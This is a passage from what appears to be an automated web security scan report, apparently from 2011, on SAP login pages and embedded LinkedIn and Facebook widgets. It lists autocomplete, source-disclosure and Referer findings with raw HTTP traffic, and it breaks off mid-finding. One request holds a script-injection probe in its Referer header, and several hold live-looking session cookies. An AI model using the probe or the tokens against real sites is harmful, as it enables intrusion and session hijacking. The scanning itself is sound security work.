Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/solution/solutiondetails/valuetoyou?language=en" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.33. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; PortalAlias=sme; a1slocale=en; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33728
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:33:53 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.34. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:57:11 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/cpslogon?SAMLRequest=d5cd04f5c6cdb69c34495656&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.35. https://www.sme.sap.com/irj/sme/memberlogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/memberlogin HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.36. https://www.sme.sap.com/irj/sme/memberlogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/memberlogin HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/cpslogon?d5cd04f5c854790111a2f8b1=1" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
14. Source code disclosure  previous  next
There are 3 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

14.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1136-RC4.11439-1337 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: platform.linkedin.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sat, 15 Oct 2011 15:27:52 GMT
Expires: Sat, 22 Oct 2011 15:27:52 GMT
Last-Modified: Fri, 14 Oct 2011 09:04:24 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144393

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1136-RC4.11439-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...
14.2. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="<jsp:getProperty name="mastheadBean" property="registerlink" />"><jsp:getProperty name="mastheadBean" property="register" /></a>
...[SNIP]...
14.3. https://www.sme.sap.com/irj/sme/memberlogin  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /irj/sme/memberlogin HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="<jsp:getProperty name="mastheadBean" property="registerlink" />"><jsp:getProperty name="mastheadBean" property="register" /></a>
...[SNIP]...
15. Referer-dependent response  previous  next
There are 7 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.86.52
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:11 GMT
Content-Length: 25213

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e9998f325bf61237187277" class="connect_widget button_count" style="font-family: &quot;tahoma&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">87</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">86</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"72e20c70",fb_dtsg:"AQBV7Aj0",ajaxpipe_token:"AXi6qNTYNK5sNg8L",no_cookies:1,lhsh:"iAQBn_lU4"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f2d1e4dc8&origin=http\u00253A\u00252F\u00252Fwww.sapvirtualevents.com\u00252Ff59d1fcc&relation=parent.parent&transport=postmessage","mobile":false,"nodeType":"link","externalURL":"http:\/\/sapvirtualevents.com\/teched\/","pageId":null,"widgetID":"conn
...[SNIP]...

Request 2

